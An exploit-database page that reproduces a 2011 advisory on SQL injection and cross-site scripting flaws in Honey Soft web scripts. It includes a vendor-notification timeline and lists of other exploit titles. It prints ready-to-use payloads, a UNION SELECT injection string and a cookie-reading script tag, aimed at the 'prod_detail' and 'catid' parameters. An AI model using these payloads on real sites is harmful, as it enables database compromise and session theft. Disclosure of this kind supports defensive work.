Menu

Search for hundreds of thousands of exploits

"Honey Soft Web Solution - Multiple Vulnerabilities"

Author

Exploit author

**RoAd_KiLlEr**

Platform

Exploit platform

php

Release date

Exploit published date

2011-03-28

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
-----------------------------------------------------------------------------------------
 Honey Soft   (detail.php?prod_detail=  & products.php?catid=)   SQL-i/XSS Multiple Vulnerabilities
-----------------------------------------------------------------------------------------
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
+=+=+=                                                                        +=+=+=
+=+=+=     /\  | |  | |            ________    _____    _____ __    _    __   +=+=+=
+=+=+=    /  \ | |__| |    _____  / ______/   |  _  \  | ____|\ \  / \  / /   +=+=+=
+=+=+=   / /\ \| |__| |  /_____/  | |         | |_) /  | |__   \ \/   \/ /    +=+=+=
+=+=+=  / ____ \ |  | |           | |_______  | __\ \  |  __|   \       /     +=+=+=
+=+=+= /_/    \_\|  | |           |________/  |_|  \_\ | |_______\_____/_____ +=+=+=
+=+=+=                                                 |_____________________|+=+=+=
+=+=+=                                                                        +=+=+= 
+=+=+=  X-n3t - **RoAd_KiLlEr** - The|Denny` - EaglE EyE - The_1nv1s1bl3      +=+=+=
+=+=+=                                                                        +=+=+= 
+=+=+=  0ne Nation , 0ne People , 0ne Culture , 0ne Language = Ethnic Albania +=+=+= 
+=+=+=                                                                        +=+=+=
+=+=+=           ....::: | ALBANIAN HACKING CREW | :::....        2011        +=+=+=
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
0                                                                      0
1                ###########################################           1
0               I'm **RoAd_KiLlEr**  member from 1337 DAY Team         1
1                ###########################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+]Title        Honey Soft   (detail.php?prod_detail=  & products.php?catid=)   SQL-i/XSS Multiple Vulnerabilities
[+]Author        **RoAd_KiLlEr**
[+]Tested on     Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: sukihack[at]gmail[dot]com 
[~] Home: http://1337day.com
[~] Vendor: http://www.honeysoft.net/

==========ExPl0iT3d by **RoAd_KiLlEr**==========



[+] Dork: No DOrk for Lamerz !!

==========================================





[ I ].  SQL-i Vulnerability
=+=+=+=+=+=+=+=+=+



[+] Description:




All the web sites that are developed by Honeysoft use the same script.
But the script is prone to SQL inection.
Input passed via the "prod_detail" parameter to detail.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
==========================================





[P0C]:  http://127.0.0.1/path/detail.php?prod_detail=[SQL-Injection] 



[D3m0]:  http://127.0.0.1/path/detail.php?prod_detail=[SQL-Injection]


[L!v3 D3m0]: http://www.site.com/detail.php?prod_detail=369+union+select+1,2,3,4,@@version,6--







[ II ].  XSS-Injection Vulnerability
=+=+=+=+=+=+=+=+=+=+=+=+



[+] Description:


Input passed via the "prod_detail=" parameter to detail.php and via the "products.php?catid=" parameter to products.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
=========================================================

[P0C]:  http://127.0.0.1/path/detail.php?prod_detail=[XSS]


[Atack Pattern]: "><script>alert(document.cookie)</script>


[L!v3 D3m0]: http://www.site.com/detail.php?prod_detail="><script>alert(document.cookie)</script>




[+] TIME TABLE:
 
26 March 2011 - Vulnerability discovered.
26 March 2011 - Vendor Notified.
26 March 2011 - Sent to vendor all data.
27 March 2011 - Vendor replied.
27 March 2011 - Advisory released.


===========================================================================================
[!] Albanian Hacking Crew           
===========================================================================================
[!] **RoAd_KiLlEr**   
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | The|DennY` | THE_1NV1S1BL3 | KHG & All Albanian/Kosova Hackers 
===========================================================================================
[!] Spec Th4nks:  r0073r  | indoushka | Sid3^effects | MaFFiTeRRoR | All  1337day Members | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2011-03-28 "Honey Soft Web Solution - Multiple Vulnerabilities" webapps php **RoAd_KiLlEr**
2010-09-27 "Allpc 2.5 osCommerce - SQL Injection / Cross-Site Scripting" webapps windows_x86 **RoAd_KiLlEr**
2010-09-27 "Car Portal 2.0 - Blind SQL Injection" webapps php **RoAd_KiLlEr**
2010-09-24 "Joomla! Component Elite Experts - SQL Injection" webapps windows_x86 **RoAd_KiLlEr**
2010-09-14 "Joomla! Component JGen 0.9.33 - SQL Injection" webapps php **RoAd_KiLlEr**
2010-07-26 "Freeway CMS 1.4.3.210 - SQL Injection" webapps php **RoAd_KiLlEr**
2010-07-06 "PreProject Multi-Vendor Shopping Malls - SQL Injection / Authentication Bypass" webapps php **RoAd_KiLlEr** 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected